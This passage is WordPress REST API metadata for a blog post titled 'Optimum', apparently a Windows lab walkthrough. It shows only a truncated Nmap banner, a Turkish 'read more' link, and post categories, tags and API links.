7.91 ( https:\/\/nmap.org ) at 2021-07-28 10:58 EDT&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/28\/optimum\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Optimum<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498,468],"tags":[577],"class_list":["post-1421","post","type-post","status-publish","format-standard","hentry","category-walkthrough","category-windows","tag-windows-exploit-suggester","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1421","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1421"}],"version-history":[{"count":3,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1421\/revisions"}],"predecessor-version":[{"id":1888,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1421\/revisions\/1888"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1421"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1421"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1421"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}